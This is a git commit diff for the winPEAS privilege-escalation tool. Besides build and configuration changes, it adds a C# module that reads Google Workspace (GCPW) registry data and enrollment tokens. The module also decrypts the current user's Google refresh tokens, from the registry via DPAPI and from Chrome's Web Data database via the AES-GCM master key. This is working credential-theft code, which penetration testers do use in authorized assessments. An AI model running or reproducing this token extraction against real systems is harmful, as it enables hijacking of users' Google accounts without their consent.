find gcpw info

2024-10-01 02:36:12 +01:00 · 2024-10-01 02:36:12 +01:00 · f90cdf9a87
commit f90cdf9a87
parent 7a9ea40cbb
11 changed files with 488 additions and 15 deletions
--- a/winPEAS/winPEASexe/Tests/.vs/winPEAS.Tests.csproj.dtbcache.json
+++ b/winPEAS/winPEASexe/Tests/.vs/winPEAS.Tests.csproj.dtbcache.json
@ -0,0 +1 @@
+{"RootPath":"C:\\Users\\carlos_hacktricks\\Desktop\\git\\PEASS-ng\\winPEAS\\winPEASexe\\Tests","ProjectFileName":"winPEAS.Tests.csproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[],"References":[],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\carlos_hacktricks\\Desktop\\git\\PEASS-ng\\winPEAS\\winPEASexe\\Tests\\bin\\Debug\\Tests.dll","OutputItemRelativePath":"Tests.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}
--- a/winPEAS/winPEASexe/Tests/App.config
+++ b/winPEAS/winPEASexe/Tests/App.config
@ -1,6 +1,30 @@
-<?xml version="1.0" encoding="utf-8" ?>
+<?xml version="1.0" encoding="utf-8"?>
 <configuration>
-    <startup> 
-        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
-    </startup>
+  <configSections>
+    <!-- For more information on Entity Framework configuration, visit http://go.microsoft.com/fwlink/?LinkID=237468 -->
+    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
+  </configSections>
+  <startup>
+    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
+  </startup>
+  <entityFramework>
+    <providers>
+      <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
+      <provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" />
+    </providers>
+  </entityFramework>
+  <system.data>
+    <DbProviderFactories>
+      <remove invariant="System.Data.SQLite.EF6" />
+      <add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6" />
+    <remove invariant="System.Data.SQLite" /><add name="SQLite Data Provider" invariant="System.Data.SQLite" description=".NET Framework Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite" /></DbProviderFactories>
+  </system.data>
+  <runtime>
+    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
+      <dependentAssembly>
+        <assemblyIdentity name="System.Runtime" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.1.2.0" newVersion="4.1.2.0" />
+      </dependentAssembly>
+    </assemblyBinding>
+  </runtime>
 </configuration>
--- a/winPEAS/winPEASexe/Tests/packages.config
+++ b/winPEAS/winPEASexe/Tests/packages.config
@ -1,7 +1,15 @@
 <?xml version="1.0" encoding="utf-8"?>
 <packages>
+  <package id="EntityFramework" version="6.4.4" targetFramework="net452" />
  <package id="Microsoft.CodeCoverage" version="16.10.0" targetFramework="net452" />
  <package id="Microsoft.NET.Test.Sdk" version="16.10.0" targetFramework="net452" />
  <package id="MSTest.TestAdapter" version="2.2.5" targetFramework="net452" />
  <package id="MSTest.TestFramework" version="2.2.5" targetFramework="net452" />
+  <package id="Newtonsoft.Json" version="13.0.3" targetFramework="net452" />
+  <package id="Portable.BouncyCastle" version="1.9.0" targetFramework="net452" />
+  <package id="Stub.System.Data.SQLite.Core.NetFramework" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite.Core" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite.EF6" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite.Linq" version="1.0.119.0" targetFramework="net452" />
 </packages>
--- a/winPEAS/winPEASexe/Tests/winPEAS.Tests.csproj
+++ b/winPEAS/winPEASexe/Tests/winPEAS.Tests.csproj
@ -1,5 +1,6 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.props" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" />
  <Import Project="..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props" Condition="Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props')" />
  <Import Project="..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.props" Condition="Exists('..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.props')" />
  <Import Project="..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.props" Condition="Exists('..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.props')" />
@ -41,6 +42,15 @@
    <StartupObject />
  </PropertyGroup>
  <ItemGroup>
+    <Reference Include="BouncyCastle.Crypto, Version=1.9.0.0, Culture=neutral, PublicKeyToken=0e99375e54769942, processorArchitecture=MSIL">
+      <HintPath>..\packages\Portable.BouncyCastle.1.9.0\lib\net40\BouncyCastle.Crypto.dll</HintPath>
+    </Reference>
+    <Reference Include="EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
+      <HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.dll</HintPath>
+    </Reference>
+    <Reference Include="EntityFramework.SqlServer, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
+      <HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.SqlServer.dll</HintPath>
+    </Reference>
    <Reference Include="Microsoft.VisualStudio.CodeCoverage.Shim, Version=15.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
      <HintPath>..\packages\Microsoft.CodeCoverage.16.10.0\lib\net45\Microsoft.VisualStudio.CodeCoverage.Shim.dll</HintPath>
    </Reference>
@ -50,8 +60,21 @@
    <Reference Include="Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
      <HintPath>..\packages\MSTest.TestFramework.2.2.5\lib\net45\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll</HintPath>
    </Reference>
+    <Reference Include="Newtonsoft.Json, Version=13.0.0.0, Culture=neutral, PublicKeyToken=30ad4fe6b2a6aeed, processorArchitecture=MSIL">
+      <HintPath>..\packages\Newtonsoft.Json.13.0.3\lib\net45\Newtonsoft.Json.dll</HintPath>
+    </Reference>
    <Reference Include="System" />
+    <Reference Include="System.ComponentModel.DataAnnotations" />
    <Reference Include="System.Core" />
+    <Reference Include="System.Data.SQLite, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
+      <HintPath>..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\lib\net451\System.Data.SQLite.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Data.SQLite.EF6, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Data.SQLite.EF6.1.0.119.0\lib\net451\System.Data.SQLite.EF6.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Data.SQLite.Linq, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Data.SQLite.Linq.1.0.119.0\lib\net451\System.Data.SQLite.Linq.dll</HintPath>
+    </Reference>
    <Reference Include="System.Xml.Linq" />
    <Reference Include="System.Data.DataSetExtensions" />
    <Reference Include="Microsoft.CSharp" />
@ -84,8 +107,13 @@
    <Error Condition="!Exists('..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets'))" />
    <Error Condition="!Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.props'))" />
    <Error Condition="!Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets'))" />
+    <Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.props'))" />
+    <Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.targets'))" />
+    <Error Condition="!Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets'))" />
  </Target>
  <Import Project="..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.targets" Condition="Exists('..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.targets')" />
  <Import Project="..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets" Condition="Exists('..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets')" />
  <Import Project="..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets" Condition="Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets')" />
+  <Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.targets" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" />
+  <Import Project="..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets" Condition="Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" />
 </Project>
--- a/winPEAS/winPEASexe/winPEAS/.vs/winPEAS.csproj.dtbcache.json
+++ b/winPEAS/winPEASexe/winPEAS/.vs/winPEAS.csproj.dtbcache.json
--- a/winPEAS/winPEASexe/winPEAS/App.config
+++ b/winPEAS/winPEASexe/winPEAS/App.config
@ -1,9 +1,25 @@
-<?xml version="1.0" encoding="utf-8"?>
+<?xml version="1.0" encoding="utf-8"?>
 <configuration>
-    <startup useLegacyV2RuntimeActivationPolicy="true"> 
-        
-    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/></startup>
-    <runtime>
-		<AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
-	</runtime>
-</configuration>
+  <configSections>
+    <!-- For more information on Entity Framework configuration, visit http://go.microsoft.com/fwlink/?LinkID=237468 -->
+    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
+  </configSections>
+  <startup useLegacyV2RuntimeActivationPolicy="true">
+    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
+  </startup>
+  <runtime>
+    <AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
+  </runtime>
+  <entityFramework>
+    <providers>
+      <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
+      <provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" />
+    </providers>
+  </entityFramework>
+  <system.data>
+    <DbProviderFactories>
+      <remove invariant="System.Data.SQLite.EF6" />
+      <add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6" />
+    <remove invariant="System.Data.SQLite" /><add name="SQLite Data Provider" invariant="System.Data.SQLite" description=".NET Framework Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite" /></DbProviderFactories>
+  </system.data>
+</configuration>
--- a/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs
@ -14,7 +14,8 @@ namespace winPEAS.Checks
            {
               new AWSInfo(),
               new AzureInfo(),
-               new GCPInfo()
+               new GCPInfo(),
+               new GCPJoinedInfo()
            };

            foreach (var cloudInfo in cloudInfoList)
--- a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GWorkspaceInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GWorkspaceInfo.cs
@ -0,0 +1,327 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Security.Cryptography;
+using System.Text;
+using winPEAS.Helpers;
+using Newtonsoft.Json;
+using System.Data.SQLite;
+using Org.BouncyCastle.Crypto;
+using Org.BouncyCastle.Crypto.Parameters;
+using Org.BouncyCastle.Crypto.Modes;
+using System.Linq;
+using Microsoft.Win32;
+
+
+namespace winPEAS.Info.CloudInfo
+{
+    internal class GCPJoinedInfo : CloudInfoBase
+    {
+        public override string Name => "Google Workspace Joined";
+
+        public override bool IsCloud => CheckIfGCPWUsers();
+
+        private Dictionary<string, List<EndpointData>> _endpointData = null;
+
+        private List<EndpointData> GetWorkspaceRegValues()
+        {
+            Dictionary<string, string> workspaceRegValues = new Dictionary<string, string>();
+            workspaceRegValues.Add("Domains Allowed", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW", @"domains_allowed_to_login"));
+
+            // Get all values from all subregistries of Users
+            string[] users = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Google\GCPW\Users");
+            for (int i = 0; i < users.Length; i++)
+            {
+                workspaceRegValues.Add($"HKLM Workspace user{i}", users[i]);
+                workspaceRegValues.Add($"    Email{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"email"));
+                workspaceRegValues.Add($"    Domain{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"domain"));
+                workspaceRegValues.Add($"    Id{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"id"));
+                workspaceRegValues.Add($"    Pic{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"pic"));
+                workspaceRegValues.Add($"    User Name{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"user_name"));
+                workspaceRegValues.Add($"    Last Policy Refresh Time{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"last_policy_refresh_time"));
+                workspaceRegValues.Add($"    Last Token Valid Millis{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"last_token_valid_millis"));
+            }
+
+            string[] users3 = Helpers.Registry.RegistryHelper.GetRegSubkeys("HCKU", @"SOFTWARE\Google\Accounts");
+            if (users3.Length > 0)
+            {
+                workspaceRegValues.Add($"HKU Workspace user", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
+            }
+                
+            for (int i = 0; i < users3.Length; i++)
+            {
+                workspaceRegValues.Add($"    HKU-Email{i}", Helpers.Registry.RegistryHelper.GetRegValue("HCKU", @"SOFTWARE\Google\Accounts\"+ users3[i], @"email"));
+                string refreshTokenPath = @"HKEY_CURRENT_USER\SOFTWARE\Google\Accounts\" + users3[i];
+                byte[] refreshTokenB = (byte[])Registry.GetValue(refreshTokenPath, @"refresh_token", null);
+                if (refreshTokenB.Length > 0)
+                {
+                    string refreshTokenDecrypted = DecryptRegRefreshToken(refreshTokenPath);
+                    if (refreshTokenDecrypted.Length > 0)
+                        workspaceRegValues.Add($"    HKU-Refresh Token{i}", refreshTokenDecrypted);
+                }
+            }
+
+            // Get cloud management tokens
+            workspaceRegValues.Add("Chrome Enrollment Token", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Policies\Google\Chrome", @"CloudManagementEnrollmentToken"));
+            workspaceRegValues.Add("Workspace Enrollment Token", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Policies\Google\CloudManagement", @"EnrollmentToken"));
+
+            // Format the info in expected CloudInfo format
+            List<EndpointData> _endpointDataList = new List<EndpointData>();
+
+            foreach (var kvp in workspaceRegValues)
+            {
+                _endpointDataList.Add(new EndpointData()
+                {
+                    EndpointName = kvp.Key,
+                    Data = kvp.Value?.Trim(),
+                    IsAttackVector = false
+                });
+            }
+
+            return _endpointDataList;
+        }
+
+        static string DecryptRegRefreshToken(string registryPath)
+        {
+            // Define the registry path where the refresh token is stored
+            string valueName = "refresh_token";
+
+            // Retrieve the encrypted refresh token from the registry
+            byte[] encryptedRefreshToken = (byte[])Registry.GetValue(registryPath, valueName, null);
+
+            if (encryptedRefreshToken == null || encryptedRefreshToken.Length == 0)
+            {
+                Console.WriteLine("No encrypted refresh token found in the registry.");
+                return "";
+            }
+
+            try
+            {
+                // Decrypt the refresh token using CryptUnprotectData
+                byte[] decryptedTokenBytes = ProtectedData.Unprotect(
+                    encryptedRefreshToken,
+                    null, // No additional entropy
+                    DataProtectionScope.CurrentUser // Use the current user's scope
+                );
+
+                // Convert the decrypted token to an ASCII string
+                string refreshToken = Encoding.ASCII.GetString(decryptedTokenBytes);
+                return refreshToken;
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("Error decrypting the refresh token: " + ex.Message);
+            }
+            return "";
+        }
+
+        public static bool CheckIfGCPWUsers()
+        {
+            string[] check = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Google\GCPW\Users");
+            return check != null && check.Length > 0; 
+        }
+
+        public override Dictionary<string, List<EndpointData>> EndpointDataList()
+        {
+            if (_endpointData == null)
+            {
+                _endpointData = new Dictionary<string, List<EndpointData>>();
+
+                try
+                {
+                    if (IsAvailable)
+                    {
+                        _endpointData.Add("Local Info", GetWorkspaceRegValues());
+                        _endpointData.Add("Local Refresh Tokens", GetRefreshToken());
+                    }
+                    else
+                    {
+                        _endpointData.Add("General Info", new List<EndpointData>()
+                        {
+                            new EndpointData()
+                            {
+                                EndpointName = "",
+                                Data = null,
+                                IsAttackVector = false
+                            }
+                        });
+                    }
+                }
+                catch (Exception ex)
+                {
+                    Beaprint.PrintException(ex.Message);
+                }
+            }
+
+            return _endpointData;
+        }
+
+        static List<EndpointData> GetRefreshToken()
+        {
+            string chromeLocalStatePath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
+            string masterKey = GetMasterKey(chromeLocalStatePath);
+
+            string[] chromeProfilePaths = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\", "Defaul*");
+            string[] chromeExtraProfilePaths = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\", "Profile*");
+            string[] chromeAllProfilePaths = chromeProfilePaths.Concat(chromeExtraProfilePaths).ToArray();
+            string[] refreshTokens = new string[0];
+
+            foreach (string profilePath in chromeAllProfilePaths)
+            {
+                string webDataPath = Path.Combine(profilePath, "Web Data");
+
+                if (File.Exists(webDataPath))
+                {
+                    refreshTokens = ExtractRefreshTokens(webDataPath, masterKey);
+                }
+            }
+
+            List<EndpointData> _endpointDataList = new List<EndpointData>();
+
+            for (int i = 0; i < refreshTokens.Length; i++)
+            {
+                _endpointDataList.Add(new EndpointData()
+                {
+                    EndpointName = $"Token{i}" ,
+                    Data = refreshTokens[i].Trim(),
+                    IsAttackVector = true
+                });
+            }
+
+            return _endpointDataList;
+        }
+
+        private static string GetMasterKey(string localStatePath)
+        {
+            string localStateJson = File.ReadAllText(localStatePath);
+            dynamic json = JsonConvert.DeserializeObject(localStateJson);
+            string encryptedKeyBase64 = json.os_crypt.encrypted_key;
+
+            byte[] encryptedKeyWithPrefix = Convert.FromBase64String(encryptedKeyBase64);
+            byte[] encryptedKey = new byte[encryptedKeyWithPrefix.Length - 5];
+            Array.Copy(encryptedKeyWithPrefix, 5, encryptedKey, 0, encryptedKeyWithPrefix.Length - 5);
+
+            byte[] masterKey = ProtectedData.Unprotect(encryptedKey, null, DataProtectionScope.CurrentUser);
+            return Convert.ToBase64String(masterKey);
+        }
+
+        private static string[] ExtractRefreshTokens(string webDataPath, string masterKey)
+        {
+            List<string> refreshTokens = new List<string>();
+            try
+            {
+                using (SQLiteConnection connection = new SQLiteConnection($"Data Source={webDataPath};Version=3;"))
+                {
+                    connection.Open();
+                    string query = "SELECT service, encrypted_token FROM token_service;";
+
+                    using (SQLiteCommand command = new SQLiteCommand(query, connection))
+                    using (SQLiteDataReader reader = command.ExecuteReader())
+                    {
+                        while (reader.Read())
+                        {
+                            string service = reader["service"].ToString();
+
+                            // Check if encrypted_token is null or empty
+                            if (reader["encrypted_token"] == DBNull.Value)
+                            {
+                                Console.WriteLine("The encrypted_token is NULL in the database.");
+                                continue;
+                            }
+                            byte[] encryptedToken = (byte[])reader["encrypted_token"];
+
+                            string decryptedToken = DecryptWithAESGCM(encryptedToken, Convert.FromBase64String(masterKey));
+                            refreshTokens.Add(decryptedToken);
+                        }
+                    }
+                }
+                return refreshTokens.ToArray();
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("Error extracting refresh tokens (If Chrome is running the DB is probably locked): " + ex.Message);
+                return refreshTokens.ToArray();
+            }
+        }
+        public static string DecryptWithAESGCM(byte[] ciphertext, byte[] key)
+        {
+            // Constants
+            int nonceLength = 12; // GCM standard nonce length
+            int macLength = 16;   // GCM authentication mac length
+            string versionPrefix = "v10"; // Matching kEncryptionVersionPrefix
+
+            // Convert prefix to byte array
+            byte[] versionPrefixBytes = Encoding.ASCII.GetBytes(versionPrefix);
+
+            // Check the prefix
+            if (ciphertext.Length < versionPrefixBytes.Length ||
+                !IsPrefixMatch(ciphertext, versionPrefixBytes))
+            {
+                throw new ArgumentException("Invalid encryption version prefix.");
+            }
+
+            // Extract the nonce from the ciphertext (after the prefix)
+            byte[] nonce = new byte[nonceLength];
+            Array.Copy(ciphertext, versionPrefixBytes.Length, nonce, 0, nonceLength);
+
+            // Extract the actual encrypted data (after the prefix and nonce)
+            int encryptedDataStartIndex = versionPrefixBytes.Length + nonceLength;
+            byte[] encryptedData = new byte[ciphertext.Length - encryptedDataStartIndex];
+            Array.Copy(ciphertext, encryptedDataStartIndex, encryptedData, 0, encryptedData.Length);
+
+            // Split the mac and actual ciphertext
+            byte[] mac = new byte[macLength];
+            Array.Copy(encryptedData, encryptedData.Length - macLength, mac, 0, macLength);
+
+            byte[] actualCiphertext = new byte[encryptedData.Length - macLength];
+            Array.Copy(encryptedData, 0, actualCiphertext, 0, actualCiphertext.Length);
+
+            // Perform the decryption using Bouncy Castle
+            try
+            {
+                GcmBlockCipher gcm = new GcmBlockCipher(new Org.BouncyCastle.Crypto.Engines.AesEngine());
+                AeadParameters parameters = new AeadParameters(new KeyParameter(key), macLength * 8, nonce);
+                gcm.Init(true, parameters);
+
+                byte[] plaintext = new byte[gcm.GetOutputSize(actualCiphertext.Length)];
+                int len = gcm.ProcessBytes(actualCiphertext, 0, actualCiphertext.Length, plaintext, 0);
+                string plaintextString = Encoding.ASCII.GetString(plaintext, 0, len);
+                gcm.DoFinal(plaintext, len);
+
+                return plaintextString;
+            }
+            catch (InvalidCipherTextException ex)
+            {
+                throw new CryptographicException("Decryption failed due to MAC mismatch", ex);
+            }
+        }
+
+        private static bool IsPrefixMatch(byte[] ciphertext, byte[] versionPrefixBytes)
+        {
+            for (int i = 0; i < versionPrefixBytes.Length; i++)
+            {
+                if (ciphertext[i] != versionPrefixBytes[i])
+                    return false;
+            }
+            return true;
+        }
+
+        private static byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform)
+        {
+            using (MemoryStream ms = new MemoryStream())
+            {
+                using (CryptoStream cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write))
+                {
+                    cryptoStream.Write(data, 0, data.Length);
+                    cryptoStream.FlushFinalBlock();
+                    return ms.ToArray();
+                }
+            }
+        }
+
+        public override bool TestConnection()
+        {
+            return true;
+        }
+    }
+}
--- a/winPEAS/winPEASexe/winPEAS/packages.config
+++ b/winPEAS/winPEASexe/winPEAS/packages.config
@ -1,4 +1,16 @@
 <?xml version="1.0" encoding="utf-8"?>
 <packages>
  <package id="AlphaFS" version="2.2.6" targetFramework="net452" />
+  <package id="EntityFramework" version="6.4.4" targetFramework="net452" />
+  <package id="Newtonsoft.Json" version="13.0.3" targetFramework="net452" />
+  <package id="Portable.BouncyCastle" version="1.9.0" targetFramework="net48" />
+  <package id="Stub.System.Data.SQLite.Core.NetFramework" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite.Core" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite.EF6" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.Data.SQLite.Linq" version="1.0.119.0" targetFramework="net452" />
+  <package id="System.IO" version="4.3.0" targetFramework="net48" />
+  <package id="System.Runtime" version="4.3.0" targetFramework="net48" />
+  <package id="System.Security.Cryptography.Encoding" version="4.3.0" targetFramework="net48" />
+  <package id="System.Security.Cryptography.Primitives" version="4.3.0" targetFramework="net48" />
 </packages>
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
@ -1,5 +1,6 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.props" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" />
  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
  <PropertyGroup>
    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
@ -8,7 +9,7 @@
    <OutputType>Exe</OutputType>
    <RootNamespace>winPEAS</RootNamespace>
    <AssemblyName>winPEAS</AssemblyName>
-    <TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
+    <TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
    <FileAlignment>512</FileAlignment>
    <Deterministic>true</Deterministic>
    <NuGetPackageImportStamp>
@ -114,12 +115,55 @@
    </StartupObject>
  </PropertyGroup>
  <ItemGroup>
+    <Reference Include="BouncyCastle.Crypto, Version=1.9.0.0, Culture=neutral, PublicKeyToken=0e99375e54769942, processorArchitecture=MSIL">
+      <HintPath>..\packages\Portable.BouncyCastle.1.9.0\lib\net40\BouncyCastle.Crypto.dll</HintPath>
+    </Reference>
+    <Reference Include="EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
+      <HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.dll</HintPath>
+    </Reference>
+    <Reference Include="EntityFramework.SqlServer, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
+      <HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.SqlServer.dll</HintPath>
+    </Reference>
+    <Reference Include="Newtonsoft.Json, Version=13.0.0.0, Culture=neutral, PublicKeyToken=30ad4fe6b2a6aeed, processorArchitecture=MSIL">
+      <HintPath>..\packages\Newtonsoft.Json.13.0.3\lib\net45\Newtonsoft.Json.dll</HintPath>
+    </Reference>
    <Reference Include="System" />
+    <Reference Include="System.ComponentModel.Composition" />
+    <Reference Include="System.ComponentModel.DataAnnotations" />
    <Reference Include="System.Core" />
+    <Reference Include="System.Data.SQLite, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
+      <HintPath>..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\lib\net451\System.Data.SQLite.dll</HintPath>
+    </Reference>
